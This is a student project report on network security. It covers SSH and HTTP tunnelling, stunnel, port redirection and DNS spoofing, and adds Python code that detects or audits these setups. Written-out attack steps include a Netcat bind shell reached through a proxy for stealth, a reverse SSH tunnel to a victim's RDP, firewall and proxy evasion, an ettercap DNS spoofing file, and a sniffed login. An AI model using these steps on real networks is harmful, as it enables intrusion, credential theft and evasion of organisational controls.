
MAHARAJA AGRASEN INSTITUTE OF TECHNOLOGY PSP AREA, SECTOR 22 ROHINI, DELHI 110085

Accessibility over closed networks


Bachelor of Technology In Computer Science and Engineering

Guide: Mrs. Garima Gupta, Lecturer, Comp. Sc. Dept.

Submitted by: Rishi Raj (1001482707), Sunil Bansal (0661482707), Shashank Gupta (1321482707)

Certificate

This is to certify that the dissertation/project report ETCS 457 entitled "Accessibility over Closed Networks", done by Mr. Rishi Raj (roll no. 1001482707), Mr. Shashank Gupta (roll no. 1321482707) and Sunil Bansal (roll no. 0661482707), is an authentic work carried out by them at Maharaja Agrasen Institute of Technology under my guidance. The matter embodied in this project work has not been submitted earlier for the award of any degree or diploma, to the best of my knowledge and belief.

Date:

_______________________
Mrs. Garima Gupta
Lecturer, Comp. Sc. Dept.

Acknowledgement
We would hereby like to express our sincere gratitude to Mrs. Garima Gupta, who has been a constant source of inspiration and a source of knowledge. We are thankful for the amount of time and effort that she had to put in to solve our queries and show us a path to move on. She gave us the freedom to move away from conventional software development projects and find a new subject which would require much research and have a steep learning curve. We were in constant touch with her, discussing the deadlocks we faced in order to achieve the goal. She was always there to boost our confidence and guide us in the right direction. We would also like to pay our respects to the other faculty, i.e. the Head of the Department Sh. Suresh Chander, Sh. Neeraj Garg, Assistant Professor, and Pooja Gupta Madam, who motivated us and solved our problems from time to time.

Sunil Bansal 0661482707

Rishi Raj 1001482707

Shashank Gupta 1321482707

ABSTRACT
In the present-day scenario, with the world being interconnected over the Internet, a concern that has come into existence is the interference caused by a third party in the form of sniffing or stealing a user's private data (credit card numbers, etc.). An example of such an attack is the "MAN IN THE MIDDLE" situation. Our aim for the minor project was to find a solution and further to expose some of the scenarios that can be used to breach security. Somebody has rightly said that in order to secure a computer, we need to dig a two-foot pit and bury the device in it; that would be ultimately secure. So here we are trying to increase security awareness related to the Internet, and we have used the following techniques to show this:

I. SSH TUNNEL: In this module we have tried to implement a tunnel from the client end to the server. This tunnel is an SSH (Secure Shell) tunnel, providing encryption between the two ends. The server in this architecture is an SSH server and the clients are called SSH clients. Our endeavour here is basically to provide security where many nodes are connected in a LAN, say for example a department in a company that wishes to be protected from its peers in the LAN.

II. HTTP TUNNELLING: We try to show how CGI proxies can be used to intercept traffic which is normally blocked by our proxy.

III. PORT REDIRECTION: The feature of port redirection can be used to access a service that is generally blocked but available on a remote computer.

IV. DNS EXPLOITATION: DNS, or name resolution, forms an important part of resolving IP addresses to names and vice versa. With a little bit of fiddling we can block or allow traffic and change the direction of traffic.

CONTENTS

i. Introduction .................................................... 6
ii. Module I: Need for Secure Shell Tunnel ......................... 6
iii. Introduction to SSH .......................................... 13
iv. Tunnels and Port Fun .......................................... 19
v. SSH Tunnelling ................................................. 20
vi. HTTP Tunnelling ............................................... 23
vii. SSL Encapsulation ............................................ 26
viii. Port Forwarding ............................................. 31
ix. DNS Exploitation .............................................. 34
x. Summary ........................................................ 37
xi. References .................................................... 38

INTRODUCTION

Use of the Internet has grown with the spread of Internet devices (notebooks, netbooks, smartphones), so the threats against it and its services have grown as well. These services are attacked by various malicious software, or by attackers sitting in your LAN. To depict the threats we have divided them into two modules.

MODULE I - NEED FOR A SECURE SHELL TUNNEL


Consider the following scenario, for clarification of the problem. In an organisation (an institution) we have many nodes working under a department. All of them access the Internet wirelessly through an access point. The threat of security-related attacks arises from the clients at the same level of the network hierarchy. We take under consideration two devices, working on their respective platforms, each with its own IP address. The two clients are:

Client A: browsing the web on his device.
Client B: acting as a sniffer, trying to access Client A's private information using a sniffing tool, Cain & Abel.

In the snapshots that follow we want to show the illegal access of Client B to Client A's data.

1. Client A trying to access a secure connection over a remote connection

At this stage, Client A has chosen to access a secure HTTP channel (one providing an SSL certificate). SSL certificates are issued by Certification Authorities like VeriSign, which act as a trusted third party and help to confirm the authenticity of the remote server's public key.

2. Client B (sniffer) using CAIN and ABEL

At this stage Client B is scanning the MAC addresses of the LAN it is connected to. This is a built-in feature of the sniffer tool it uses.

3. Client B tries to Hijack traffic

At this stage the sniffer selects Client A's IP address and the other IP addresses on which it wishes to listen to or hijack the data traffic.

4. Client B fails to detect data packets

As we mentioned before, Client A is logged in to the remote site using port 443 (HTTPS). Hence all the data packets it sends and receives are already encrypted, so secrecy at the network level is maintained.


5. Client A logs on to an unsecure site

In order to show the need for security enhancement over the network, this time Client A has logged on to http://www.rediffmail.com, which operates on port 80, i.e. unsecured HTTP.


6. Client B password poisoning

At this stage Cain and Abel detects the password and username entered by Client A. This is done by a built-in tool of the software called Password Poisoning. We can note: Password: admin, Username: rishanky.


This leak of private information is the problem that the security enhancement covered in this project addresses.

INTRODUCTION TO SSH
With unsecured Wi-Fi Internet connections, the main issue is other users sniffing your data with network analyzer tools like Wireshark, Cain and Abel, EtherApe, etc. For privacy and security while browsing the Internet, you need a security mechanism such as an SSH tunnel. If you have access to a server running SSH, you can securely send your Internet data through that server in an encrypted network tunnel. You can set up specific tunnels for different ports, for example to secure your email. In this paper we have included one module on building an SSH tunnel to secure HTTP traffic.

SECURE SHELL
Secure Shell (SSH) is a network protocol that allows data to be exchanged over a secure channel between two networked devices. Used primarily on Linux and Unix based systems to access shell accounts, SSH was designed as a replacement for Telnet and other insecure remote shells, which send information, notably passwords, in plaintext, leaving them open to interception. The encryption used by SSH provides confidentiality and integrity of data over an insecure network such as the Internet.

DEFINITION


SSH uses public-key cryptography to authenticate the remote computer and allow the remote computer to authenticate the user, if necessary. SSH is typically used to log into a remote machine and execute commands, but it also supports tunneling, forwarding TCP ports and X11 connections; it can transfer files using the associated SFTP or SCP protocols. SSH uses the client-server model. The standard TCP port 22 has been assigned for contacting SSH servers. An SSH client program is typically used for establishing connections to an SSH daemon accepting remote connections. Both are commonly present on most modern operating systems, including Mac OS X, Linux, FreeBSD, Solaris and OpenVMS. Proprietary, freeware and open source versions of various levels of complexity and completeness exist.

USES
SSH is a protocol that can be used for many applications. Some of the applications below may require features that are only available in, or compatible with, specific SSH clients or servers. For example, using the SSH protocol to implement an SSH tunnel is possible, but presently only with the OpenSSH server and client implementation.

i) For login to a shell on a remote host (replacing Telnet and rlogin)
ii) For executing a single command on a remote host (replacing rsh)
iii) For copying files from a local server to a remote host (see SCP, as an alternative to rcp)
iv) In combination with SFTP, as a secure alternative to FTP file transfer
v) In combination with rsync, to back up, copy and mirror files efficiently and securely
vi) For port forwarding or tunnelling a port (not to be confused with a VPN, which routes packets between different networks or bridges two broadcast domains into one)
vii) For use as a full-fledged encrypted VPN. Note that only the OpenSSH server and client support this feature.
viii) For forwarding X11 through multiple hosts
ix) For browsing the web through an encrypted proxy connection, with SSH clients that support the SOCKS protocol

In this paper we will present how to configure an OpenSSH server on the Linux and Windows operating systems, and also show the use of the graphical SSH client PuTTY to form the client-server architecture of SSH for making the secure SSH proxy tunnel.

USING A SERVER SERVICE THROUGH A SSH TUNNEL


The following is a short description of how to use an SSH tunnel from the command line. This assumes an SSH server is running and an SSH client is available. Proceed as follows:

1. Open a console on your client.
2. Type:
ssh -L [local port]:localhost:[remote port] [username]@[remote server]

From now on you can reach the remote service by accessing localhost on port [local port]. Parameters:

[local port] : the port you'll use on your client
[remote port] : the port you need to reach on the remote server
[username] : your username on the remote server
[remote server] : the remote server's public hostname or IP address

So, for example, if you want to access the web server running on the remote server on port 80, you would write:
ssh -L 8080:localhost:80 [username]@[remote server]
Opening the URL http://localhost:8080 in your browser, you'll be able to access the remote web server.

Our effort was to successfully implement the client-server architecture of SSH, such that a client within the WLAN can access a local SSH server for secure Internet connections. We have configured the SSH server on Ubuntu Linux (10.04) and on Microsoft Windows 7 as well, using Cygwin, open-source software from Red Hat Inc.; the configuration and usage of the SSH client PuTTY is described in one of the two manuals we have included in this paper. With this module we have explored tools like Wireshark (network monitoring), Cain & Abel (network sniffing) and PuTTY (SSH client), and created a protection, the secured SSH proxy tunnel, for encrypted Internet browsing in a WLAN (preferably) or a LAN.

Resources used:

i) HARDWARE
a) Netbook or notebook used as a Mobile Internet Device (MID)
b) Desktop acting as the fixed SSH server
c) WiFi modem (preferably) or wired LAN

ii) OPERATING SYSTEM
a) Ubuntu 10.04
b) Microsoft Windows 7
c) BackTrack 4

iii) SOFTWARE AND TOOLS
a) Wireshark
b) Cain & Abel
c) PuTTY
d) Firefox Internet Browser
e) Ettercap
f) Webmin for network administration

TUNNELS AND PORT FUN

Topics covered: SSH Tunnels, HTTP Tunnels, SSL Encapsulation, Remote Port Forwarding, Pen Testing

SSH Tunnelling

At Home

We need a proxy running at home, and it really only needs to accept proxy connections from localhost. Lots of people already have Apache running, and making it load the proxy module and configuring it for localhost is easy and quickly done. Of course you can opt for other proxy software, such as Squid, if you prefer. In this example we assume that the proxy runs on port 80, the same port the typical Apache install uses. We may want to enable HTTPS, FTP and other protocols in the proxy config.

We also need sshd running on port 443. Most people already have sshd running; you just need to make it also listen for connections on port 443. Port 443 is normally used for HTTPS, and that is why we use it: most proxies are configured to allow connections to 443, since companies want their employees to be able to use banks and other HTTPS web services on the net.

At Work

We will need an SSH client that can issue CONNECT requests through the company HTTP proxy. If you're on Windows, PuTTY is fine, as it has built-in support for tunnelling through an HTTP proxy. If you're on Unix/Linux (or Cygwin) you can use OpenSSH with corkscrew to go through the proxy to your home computer's port 443. If using OpenSSH, you'd add the following line to your ~/.ssh/config file:
ProxyCommand /usr/local/bin/corkscrew proxy.work.com 80 %h %p

You configure the SSH client to port-forward a local port, say 8080, to the remote's localhost:80. Now you have a channel established to your home computer over a securely encrypted connection. Of course you also get an SSH login, and you can start your X programs from home to pop up at work, etc.

The OpenSSH command line to connect and port-forward the proxy could then look like this:
ssh -L 8080:localhost:80 user@server.at.home -p 443

Configure your browser at work to use "localhost:8080" as proxy, for all the protocols you have enabled in your proxy at home. All subsequent browser requests are then sent over the SSH connection, through the proxy, to the ssh server at home and from there to your proxy, and out in the world...

Imagine an attacker has received a reverse shell from a victim on a non-routable network. This victim also has Remote Desktop (TCP port 3389) enabled on his machine. The attacker has the username/password for the victim machine (password dumping/hash cracking, keylogging, etc.) and wants to connect to the victim's Remote Desktop service. Note that the victim is on a non-routable network, behind NAT. The attacker can configure his SSH server to listen on port 80 and create an SSH tunnel between the attacker machine and the victim machine in which port 3389 is redirected from the victim machine to the attacker machine. The attacker can now connect to his own 127.0.0.1 address on port 3389 and will be redirected back to the victim machine.

Here is a close-up on the communication channels:

In this exercise we will create a tunnel between Bob and Anne. Bob is behind NAT, and Anne would like to connect to his RDP service. She asks Bob to create an SSH tunnel from his machine to her local computer, which is running an SSH server. Bob is running Windows XP and Anne is running Linux. Bob uses the plink SSH client for Windows and creates the tunnel:
plink -l root -pw password -C -R 3389:127.0.0.1:3389 <anne's IP>

HTTP Tunnelling
HTTP Tunneling is a technique by which communications performed using various network protocols are encapsulated using the HTTP protocol, the network protocols in question usually belonging to the TCP/IP family of protocols. The HTTP protocol therefore acts as a wrapper for a covert channel that the network protocol being tunneled uses to communicate. The HTTP stream with its covert channel is termed an HTTP Tunnel. HTTP Tunnel software consists of client-server HTTP Tunneling applications that integrate with existing application software, permitting them to be used in conditions of restricted network connectivity including firewalled networks, networks behind proxy servers, and NATs.

For example, consider the following situation:

Victim : 85.64.226.117 (shell listening on port 3030)
Attacker : 83.130.79.89
Proxy : 85.64.228.230 (proxy listening on port 8888)

Our victim has a Netcat bind shell waiting for us on port 3030. For stealth reasons, we want to connect to that Netcat shell via a proxy. We can do this via the CONNECT method:

bt ~ # nc -nvv 85.64.228.230 8888
(UNKNOWN) [85.64.228.230] 8888 (?) open
CONNECT 85.64.226.117:3030 HTTP/1.0

HTTP/1.0 200 Connection established
Proxy-agent: tinyproxy/1.6.3

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>ipconfig
ipconfig

Windows IP Configuration

Ethernet adapter Local Area Connection 2:

        Connection-specific DNS Suffix  . :
        IP Address. . . . . . . . . . . . : 85.64.226.117
        Subnet Mask . . . . . . . . . . . : 255.255.255.0
        Default Gateway . . . . . . . . . : 85.64.226.1

C:\WINDOWS\system3

This is what the Netcat connection on the victim machine looks like:
C:\WINDOWS\system32>nc -lvp 3030 -e cmd.exe
listening on [any] 3030 ...
connect to [85.64.226.117] from [85.64.228.230] 48122

Notice that the connecting machine's IP is identified as 85.64.228.230, our proxy server.

Notice the URL in the above scenario.
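The CONNECT exchange above is also what a defender sees in the proxy's own logs. As an added example (not code from the report), the following parses CONNECT request lines of the form shown and flags tunnels to ports other than 443; the request lines in SAMPLE_REQUESTS are constructed for the demo.

```python
import re

# Added example, not from the report: parse the HTTP CONNECT request shown above
# and flag tunnels to ports a forward proxy has no business opening. Proxies
# allow CONNECT so that HTTPS (port 443) can pass; any other target port means the
# proxy is being used as a generic TCP relay, exactly as in the Netcat session.
CONNECT_RE = re.compile(r"^CONNECT\s+(\S+):(\d{1,5})\s+HTTP/1\.[01]$")

# Constructed sample of request lines as a proxy access log might record them.
SAMPLE_REQUESTS = [
    "CONNECT 85.64.226.117:3030 HTTP/1.0",         # the bind shell from the scenario
    "CONNECT www.example-bank.test:443 HTTP/1.1",  # ordinary HTTPS through the proxy
    "CONNECT 203.0.113.5:22 HTTP/1.1",             # SSH wrapped in CONNECT
    "GET http://www.example.test/ HTTP/1.1",       # plain proxied request, no tunnel
    "CONNECT nonsense HTTP/1.1",                   # malformed: no port
]

def parse_connect(line):
    """Return (host, port) for a CONNECT request line, or None if it is not one."""
    m = CONNECT_RE.match(line.strip())
    if not m:
        return None
    host, port = m.group(1).strip("[]"), int(m.group(2))   # handles [::1]:443 too
    if not 0 < port < 65536:
        return None
    return host, port

def audit_connects(lines, allowed_ports=(443,)):
    """Return [(host, port, reason)] for CONNECT targets outside allowed_ports."""
    findings = []
    for line in lines:
        target = parse_connect(line)
        if target is None:
            continue                      # not a well-formed CONNECT request
        host, port = target
        if port not in allowed_ports:
            findings.append((host, port, "CONNECT to non-HTTPS port %d" % port))
    return findings
```

Run over SAMPLE_REQUESTS, audit_connects reports the port 3030 and port 22 tunnels and ignores the HTTPS CONNECT, the plain GET and the malformed line.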

SSL Encapsulation
Stunnel is designed to work as an SSL encryption wrapper between a remote client and a local or remote server. It can be used to add SSL functionality to commonly used daemons such as POP2, POP3 and IMAP servers without any changes to the program code. Stunnel can also be used to encrypt traffic, to help prevent various MITM attacks, or to evade IDS/IPS systems. Let's examine a scenario where we have a mail server that supports SSL connections, but our mail client has no SSL support. We are concerned that an attacker might be eavesdropping on our local LAN, and we would like to add SSL support to our mail client.

On our office machine, we would configure Stunnel to listen on 127.0.0.1, port 110, and encapsulate and redirect any traffic arriving at this port to our mail server, port 995 (POP3 over SSL). Notice that if we try talking to this port in raw TCP, we get no response, as the mail server expects an SSL handshake:
bt ~ # nc -v 208.69.121.74 995
vnemous.nexcess.net [208.69.121.74] 995 (pop3s) open
^C punt!
bt ~ #

We configure our stunnel.conf (/usr/local/etc/stunnel/stunnel.conf):

cert = /usr/local/etc/stunnel/stunnel.pem

; Some security enhancements for UNIX systems - comment them out on Win32
chroot = /usr/local/var/lib/stunnel/
setuid = nobody
setgid = nogroup
pid = /stunnel.pid

client = yes

; Service-level configuration

[pop3s]
accept = 127.0.0.1:110
connect = 208.69.121.74:995

We run Stunnel and should now be able to connect to our SSL-enabled mail server through port 110 on 127.0.0.1.

bt ~ # stunnel
bt ~ # nc -v 127.0.0.1 110
localhost [127.0.0.1] 110 (pop3) open
+OK Hello there.
USER myusername
+OK Password required.
PASS mypassword
-ERR Login failed.
QUIT
+OK Better luck next time.
bt
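Two settings decide whether the wrapper above actually protects the POP3 login against the LAN eavesdropper in the scenario: the plaintext leg must stay on loopback, and stunnel must verify the mail server's certificate, which the configuration as written does not ask for. As an added example (not code from the report), the following checker parses stunnel.conf files in the layout used above, using the verify and CAfile/CApath options from the stunnel manual; the CA bundle path in FIXED_CONF is an assumption.

```python
# Added example, not from the report: a checker for stunnel.conf files in the
# layout used above. It reads the global and [service] sections and reports
# settings that leave the SSL wrapper weaker than the scenario intends.

# The report's own configuration (copied as constructed sample) and a hardened
# variant that adds peer verification; the CA bundle path is an assumption.
WEAK_CONF = """\
cert = /usr/local/etc/stunnel/stunnel.pem
; Some security enhancements for UNIX systems - comment them out on Win32
chroot = /usr/local/var/lib/stunnel/
setuid = nobody
setgid = nogroup
pid = /stunnel.pid
client = yes
; Service-level configuration
[pop3s]
accept = 127.0.0.1:110
connect = 208.69.121.74:995
"""
FIXED_CONF = WEAK_CONF + """\
; added: verify the mail server's certificate against a CA bundle (assumed path)
verify = 2
CAfile = /usr/local/etc/stunnel/ca-certs.pem
"""

def parse_stunnel_conf(text):
    """Return (global_options, {service_name: options}). ';' starts a comment."""
    global_opts, services, current = {}, {}, None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            services[current] = {}
        elif "=" in line:
            key, value = (part.strip() for part in line.split("=", 1))
            (services[current] if current else global_opts)[key] = value
        else:
            raise ValueError("unparsable stunnel.conf line: %r" % raw)
    return global_opts, services

def audit_stunnel_conf(text):
    """Return a list of findings for client-mode services (empty if none)."""
    global_opts, services = parse_stunnel_conf(text)
    findings = []
    for name, opts in services.items():
        eff = {**global_opts, **opts}            # service options override globals
        if eff.get("client", "no").lower() != "yes":
            continue
        # The plaintext leg runs between the mail client and stunnel. Binding it to
        # anything but loopback would expose the unencrypted POP3 login to the LAN,
        # i.e. to exactly the eavesdropper the scenario is worried about.
        accept = eff.get("accept", "")
        host = accept.rsplit(":", 1)[0].strip("[]") if ":" in accept else ""
        if host not in ("127.0.0.1", "localhost", "::1"):
            findings.append("%s: accept=%r is not loopback-only" % (name, accept))
        # With no verification (stunnel's default) the handshake completes with any
        # certificate, so a man-in-the-middle on the path to port 995 goes unnoticed.
        has_ca = bool(eff.get("CAfile") or eff.get("CApath"))
        if eff.get("verify", "0") not in ("2", "3") or not has_ca:
            findings.append("%s: no peer certificate verification "
                            "(set verify = 2 and CAfile or CApath)" % name)
    return findings
```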


PORT FORWARDING
Port redirection involves accepting traffic on a network interface, on a specific port, and redirecting it to a different IP address/port. This ability can be useful to us in several situations. Let's examine the following scenario:

Imagine we are at the office, which is protected by a firewall with strict outbound rules, allowing only outbound traffic on port 80 (with no content inspection). You are an IRC addict and must constantly be connected to your favorite IRC server in order to maintain your mental health. On your home computer, you can listen on port 80 and redirect any incoming traffic on that port to the IRC server, port 6667. There are several port redirectors for Windows platforms, such as fpipe and winrelay. My favorite port redirector is rinetd, which is present on BackTrack. Let's solve our problem:

Home computer : 85.64.228.230
IRC Server : irc.freenode.net

We can configure rinetd using /etc/rinetd.conf :

85.64.228.230 80 irc.freenode.net 6667

We then run rinetd and try to connect to our home computer on port 80.

C:\>nc -nv 85.64.228.230 80
(UNKNOWN) [85.64.228.230] 80 (?) open
NOTICE AUTH :*** Looking up your hostname...
NOTICE AUTH :*** Checking ident
NOTICE AUTH :*** No identd (auth) response
NOTICE AUTH :*** Found your hostname

We see that we are successfully redirected to the IRC server. We can now point our IRC client to connect to server 85.64.230.80, port 80. Since we are redirecting traffic through port 80, it is not blocked by our corporate firewall.
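What rinetd does with the rule above, and what ssh -L does for the local end of the tunnel described earlier, is the same TCP relay: accept on one address and port, open a second connection to the configured destination, and copy bytes both ways. As an added example (not the report's code, nor rinetd's), the following implements that relay in Python with a parser for the rinetd.conf rule layout; it is exercised offline against a local echo service that stands in for the IRC server, and port 0 in the demo rule means "pick a free port" (rinetd itself expects a real port).

```python
import socket
import threading

# Added example, not code from the report: a rinetd-style TCP port redirector
# (stdlib only); rules use the /etc/rinetd.conf layout above: bind_addr bind_port dest dest_port

def parse_rinetd_conf(text):
    """Return [(bind_addr, bind_port, dest_host, dest_port)] from rinetd syntax."""
    rules = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()          # '#' starts a comment
        if not line:
            continue
        fields = line.split()
        if len(fields) != 4:
            raise ValueError("bad rinetd rule: %r" % line)
        rules.append((fields[0], int(fields[1]), fields[2], int(fields[3])))
    return rules

def _pump(src, dst):
    """Copy bytes one way until EOF, then close the peer's write side."""
    try:
        while data := src.recv(4096):
            dst.sendall(data)
        dst.shutdown(socket.SHUT_WR)
    except OSError:
        pass

class Redirector:
    def __init__(self, rule):
        self.bind_addr, self.bind_port, self.dest_host, self.dest_port = rule
        self.log = []                       # (client_ip, client_port) per connection
        self.server = socket.socket()
        self.server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        self.server.bind((self.bind_addr, self.bind_port))
        self.server.listen(5)
        self.port = self.server.getsockname()[1]   # real port when 0 was requested
        threading.Thread(target=self._accept_loop, daemon=True).start()

    def _accept_loop(self):
        while True:
            try:
                client, addr = self.server.accept()
            except OSError:
                return                          # listener was closed
            # The destination only ever sees the redirector's address (as the Netcat
            # listener above logged the proxy's IP); this log is the one place the
            # real originating client is recorded.
            self.log.append(addr[:2])
            upstream = socket.create_connection((self.dest_host, self.dest_port))
            threading.Thread(target=_pump, args=(client, upstream), daemon=True).start()
            threading.Thread(target=_pump, args=(upstream, client), daemon=True).start()

def _echo_server():
    # Constructed stand-in for the remote service: echoes bytes back. Returns its port.
    srv = socket.socket()
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    def loop():
        while True:
            conn, _ = srv.accept()
            threading.Thread(target=_pump, args=(conn, conn), daemon=True).start()
    threading.Thread(target=loop, daemon=True).start()
    return srv.getsockname()[1]

def demo_roundtrip(payload=b"NICK tester\r\n"):
    """Send payload through the redirector; return (echoed reply, clients logged)."""
    rules = parse_rinetd_conf("127.0.0.1 0 127.0.0.1 %d" % _echo_server())   # 0: free port
    rd = Redirector(rules[0])
    with socket.create_connection(("127.0.0.1", rd.port)) as c:
        c.sendall(payload)
        c.shutdown(socket.SHUT_WR)
        reply = b"".join(iter(lambda: c.recv(4096), b""))
    rd.server.close()
    return reply, len(rd.log)
```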


DNS EXPLOITATION
DNS SPOOFING

Reference: http://www.securesphere.net/download/papers/dnsspoof.htm

We customized our DNS spoofing configuration file, /usr/local/share/ettercap/etter.dns:

microsoft.com A 192.168.2.114
*.microsoft.com A 192.168.2.114
www.microsoft.com PTR 192.168.2.114 # Wildcards in PTR are not allowed


Once the victim (192.168.2.111) tries browsing to any host under *.microsoft.com, his DNS request is intercepted and the answer replaced with our entry. He will now be redirected to our own web server (192.168.2.114).
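Seen from the victim's side of the LAN, the spoofed entries above leave two traces: a public name answered with a private address, and many different names under one domain all answered with the same address (the effect of the *.microsoft.com wildcard). As an added example (not code from the report), the following detection logic runs over a constructed sample of DNS answers as a passive monitor might record them; the internal-name suffix list is an assumption for the demo.

```python
import ipaddress
from collections import defaultdict

# Added example, not from the report: detection logic for the kind of spoofed
# answer an etter.dns entry like the one above produces. It runs over a
# constructed sample of answers as a passive DNS monitor on the LAN might log them.
SAMPLE_ANSWERS = [
    # (client, queried name, record type, answer)
    ("192.168.2.111", "www.microsoft.com", "A", "192.168.2.114"),
    ("192.168.2.111", "update.microsoft.com", "A", "192.168.2.114"),
    ("192.168.2.111", "login.microsoft.com", "A", "192.168.2.114"),
    ("192.168.2.111", "www.example.test", "A", "203.0.113.10"),
    ("192.168.2.111", "intranet.corp.local", "A", "192.168.2.20"),
    ("192.168.2.112", "www.example.test", "A", "203.0.113.10"),
]

# RFC 1918 and loopback ranges: a public name should never resolve into these.
PRIVATE_NETS = [ipaddress.ip_network(n) for n in
                ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8")]
# Name suffixes the organisation legitimately serves from internal addresses
# (assumed for this example).
INTERNAL_SUFFIXES = (".corp.local",)

def is_private(ip_text):
    ip = ipaddress.ip_address(ip_text)
    return any(ip in net for net in PRIVATE_NETS)

def registrable_domain(qname):
    """Crude last-two-labels approximation, sufficient for the sample names."""
    return ".".join(qname.lower().rstrip(".").split(".")[-2:])

def detect_spoofed_answers(answers, wildcard_threshold=3):
    """Return findings: (a) public names answered with private addresses and
    (b) many names under one domain pinned to a single address, which is what
    a *.domain wildcard entry looks like on the wire."""
    findings = []
    names_per_target = defaultdict(set)
    for client, qname, rtype, answer in answers:
        if rtype != "A":
            continue
        name = qname.lower().rstrip(".")
        if is_private(answer) and not name.endswith(INTERNAL_SUFFIXES):
            findings.append("public name %s answered with private address %s "
                            "(client %s)" % (name, answer, client))
        names_per_target[(registrable_domain(name), answer)].add(name)
    for (domain, answer), names in names_per_target.items():
        if len(names) >= wildcard_threshold:
            findings.append("%d names under %s all resolve to %s (wildcard entry?)"
                            % (len(names), domain, answer))
    return findings
```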


DNS FILTERING using OPENDNS



OpenDNS is a DNS (Domain Name System) resolution service. An opt-in service, OpenDNS offers faster resolution and advanced features such as misspelling correction, phishing protection and optional content filtering. This public service can be exploited if it is not utilised well.


SUMMARY

In order to complete the project we had undertaken, our major concern was to learn new technology and to become competent enough to implement what we had researched and learnt. To emphasise the concerns regarding network- and system-level security, we took the following under consideration.

Network-level security: this concern regards attacks like "MAN IN THE MIDDLE" or the "BUCKET BRIGADE ATTACK". They are special cases of eavesdropping in a network by other mischievous clients. Other ways security can be breached are by using combinations of the various tunnelling and port-forwarding techniques. These all form the very tip of the iceberg of the whole security field. Further, there are also attacks like client-side attacks, server-side includes and vulnerability exploitation using frameworks like Metasploit and Core Impact. Furthermore, buffer overflows form a major concern for all application developers and people in the security field, and to start all of these, information gathering is basic. It is such an important phase that it consumes nearly 25 to 30% of the time; you can imagine that no security exploitation work has started yet and so much of the time is already devoted to it.

So with all these we enter the wild zone of pentesting, where a server's security is breached even when the network administrator has done his job fine. In this paper we have tried to access vulnerabilities using the tunnelling and port redirection part. A lot of work is still left, but in this semester we have tried to show our sincere effort towards our project.

REFERENCES

EBooks and books

James F. Kurose and Keith W. Ross, Computer Networking: A Top-Down Approach Featuring the Internet, preliminary edition for spring 2000
RHEL 4 SELinux Study Guide, Red Hat Inc.
RH429 SELinux Guide, Red Hat Inc.

Web Content

www.openssh.com
www.knightwise.com [PUTTY]
http://www.redhat.com/docs/manuals/linux/RHL-7.3-Manual/custom-guide/s1-opensshclient-config.html [SSH Server]
http://www.redhat.com/docs/manuals/linux/RHL-7.3-Manual/custom-guide/s1-opensshserver-config.html [SSH Client]
www.stunnel.org [STUNNEL]
http://en.wikipedia.org/wiki/Secure_Shell
http://www.chiark.greenend.org.uk/~sgtatham/putty/ [PUTTY]
http://www.chiark.greenend.org.uk/~sgtatham/putty/download.html [PUTTY]
http://chinese-watercolor.com/LRP/printsrv/cygwin-sshd.html [CYGWIN]
www.opendns.com
daniel.haxx.se/docs/sshproxy
www.offensivesecurity.com
